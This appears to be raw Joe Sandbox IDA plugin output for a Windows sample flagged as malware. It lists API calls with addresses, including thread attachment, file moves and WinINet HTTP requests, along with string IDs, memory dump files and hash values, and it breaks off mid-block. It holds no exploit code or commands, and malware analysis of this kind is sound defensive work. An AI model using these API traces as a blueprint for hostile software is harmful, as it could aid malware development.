                                                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 0-1603158881
                                                                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                        • DestroyWindow.USER32(?), ref: 00426F50
                                                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                        • String ID: close all$#v
                                                                        • API String ID: 4174999648-3101823635
                                                                        • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                        • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                        APIs
                                                                        • CreateMenu.USER32 ref: 00448603
                                                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                        • IsMenu.USER32(?), ref: 004486AB
                                                                        • CreatePopupMenu.USER32 ref: 004486B5
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                        • DrawMenuBar.USER32 ref: 004486F5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                        • String ID: 0
                                                                        • API String ID: 161812096-4108050209
                                                                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe), ref: 00434057
                                                                        • LoadStringW.USER32(00000000), ref: 00434060
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                        • LoadStringW.USER32(00000000), ref: 00434078
                                                                        • _wprintf.LIBCMT ref: 004340A1
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                        Strings
                                                                        • C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe, xrefs: 00434040
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe
                                                                        • API String ID: 3648134473-1023133914
                                                                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                                                                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                        • Opcode Fuzzy Hash: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                                                                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                        • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                        • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                        • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                        APIs
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,0040F545,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,004A90E8,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,?,0040F545), ref: 0041013C
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 978794511-0
                                                                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_memcmp
                                                                        • String ID: '$\$h
                                                                        • API String ID: 2205784470-1303700344
                                                                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                        • __swprintf.LIBCMT ref: 0045EC33
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                        Strings
                                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 2441338619-1568723262
                                                                        • Opcode ID: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                                                                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                        • Opcode Fuzzy Hash: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                                                                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                        APIs
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                        • String ID: @COM_EVENTOBJ
                                                                        • API String ID: 327565842-2228938565
                                                                        • Opcode ID: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                        • Opcode Fuzzy Hash: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                        APIs
                                                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                        • String ID: H
                                                                        • API String ID: 3613100350-2852464175
                                                                        • Opcode ID: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                                                                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                        • Opcode Fuzzy Hash: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                                                                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
